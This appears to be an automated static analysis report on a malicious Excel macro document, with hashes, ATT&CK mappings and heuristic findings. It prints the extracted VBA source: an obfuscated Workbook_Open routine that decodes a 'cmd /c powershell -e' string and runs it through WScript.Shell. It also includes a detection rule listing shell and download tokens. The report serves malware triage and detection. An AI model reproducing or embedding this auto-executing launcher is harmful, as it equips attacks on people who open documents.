Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 38f1c230e67f4795…

MALICIOUS

Office (OOXML)

Size: 20.3 KB
Created: 2021-08-04 16:20:46 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2026-06-05
MD5: ac21a5908816f7af6e26cf8cc37269d2
SHA-1: 1f45b3f7c6a57153874f42278d99090ae62af8bd
SHA-256: 38f1c230e67f47952934152f488929129bbeb463e5ab70a5820b31fa64fdfb56
Risk Score: 170

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1071.001 Web Protocols

The critical heuristic 'WScript.Shell usage' and the high heuristic 'CreateObject call' indicate that the VBA macro is designed to execute arbitrary code. The Workbook_Open macro is automatically triggered upon opening the document, suggesting an attempt to download and execute a second-stage payload. The obfuscated nature of the VBA code and the presence of encoded strings further support this conclusion.

Heuristics (6)

  • VBA project inside OOXML (severity: medium; 4 related findings; rule: OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage (severity: critical; rule: OLE_VBA_WSCRIPT)
    Matched line in script:
    yvnxfkqzylaegnowyqcnpuhgelijjrg = "WSCript.shell"
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    Matched line in script:
    Set ukdgnamfojmhj = CreateObject(yvnxfkqzylaegnowyqcnpuhgelijjrg)
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro (severity: low; rule: OLE_VBA_WBOPEN)
    Matched line in script:
    Private Sub workbook_open()
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1
Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 8492 bytes
SHA-256: 9317ed545ed193ac4dd7502586662f163d7a6b21269d1759ca1dc97eef86578c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 9 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AddTextBeforeSelection()
 Selection.InsertBefore Text:="new text "
End Sub
Private Sub workbook_open()
absq.hmpa
iuyi = bfghfgfgh

End Sub
Sub InsertTextAtEndOfDocument()
 ActiveDocument.Content.InsertAfter Text:=" The end."
End Sub

Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "absq"
Sub SetParagraphRange()
    Dim docActive As Document
    Dim rngParagraphs As Range
    Set docActive = ActiveDocument
    Set rngParagraphs = docActive.Range(Start:=docActive.Paragraphs(2).Range.Start, _
        End:=docActive.Paragraphs(3).Range.End)
End Sub
Sub hmpa()
loqk = hff(213) & hff(191) & hff(182) & hff(146) & hff(161) & hff(181) & hff(146) & hff(194) & hff(193) & hff(208) & hff(233) & hff(208) & hff(183) & hff(228) & hff(229) & hff(208) & hff(218) & hff(183) & hff(208) & hff(222) & hff(222) & hff(146) & hff(159) & hff(183) & hff(146)

On Error Resume Next
fgwtkzkxydqtplhefritezkzd = loqk
pmjsiibvqoddmgkoylolr (fgwtkzkxydqtplhefritezkzd)
End Sub
Sub SetRangeForFirstTenCharacters()
    Dim rngTenCharacters As Range
    Set rngTenCharacters = ActiveDocument.Range(Start:=0, End:=10)
End Sub
Function pmjsiibvqoddmgkoylolr(pvbojanhuggrmcahdwuaoejhfcfh As String)
hgkovmmxz = 7 - 7
csdcsd = "asda sadsa sda"
yvnxfkqzylaegnowyqcnpuhgelijjrg = "WSCript.shell"
Set ukdgnamfojmhj = CreateObject(yvnxfkqzylaegnowyqcnpuhgelijjrg)
qacdx = ukdgnamfojmhj.Run(pvbojanhuggrmcahdwuaoejhfcfh, hgkovmmxz)
End Function
Sub SetRangeForFirstThreeWords()
    Dim docActive As Document
    Dim rngThreeWords As Range
    Set docActive = ActiveDocument
    Set rngThreeWords = docActive.Range(Start:=docActive.Words(1).Start, _
        End:=docActive.Words(3).End)
End Sub
Function hff(bgfbg As Variant)
bcvv = "gfgdfs  vxcb 98"
hff = Chr(bgfbg - 114)
fgdsg = "vcxb xvcb sgd vcxb fsdg fgsdgdf"
End Function
Sub Macro1()
    With Selection.ParagraphFormat
        .LeftIndent = InchesToPoints(0)
        .RightIndent = InchesToPoints(0)
        .SpaceBefore = 6
        .SpaceAfter = 6
        .LineSpacingRule = 0
        .Alignment = wdAlignParagraphLeft
        .WidowControl = True
        .KeepWithNext = False
        .KeepTogether = False
        .PageBreakBefore = False
        .NoLineNumber = False
        .Hyphenation = True
        .FirstLineIndent = InchesToPoints(0)
        .OutlineLevel = 10
    End With
End Sub
Artifact 2
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 28672 bytes
SHA-256: 730bad1bd1d56980a1dfae7cc241523f2e26b78e0a6b0411bf236d1fcd3ad88c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 9 long base64-like blob(s).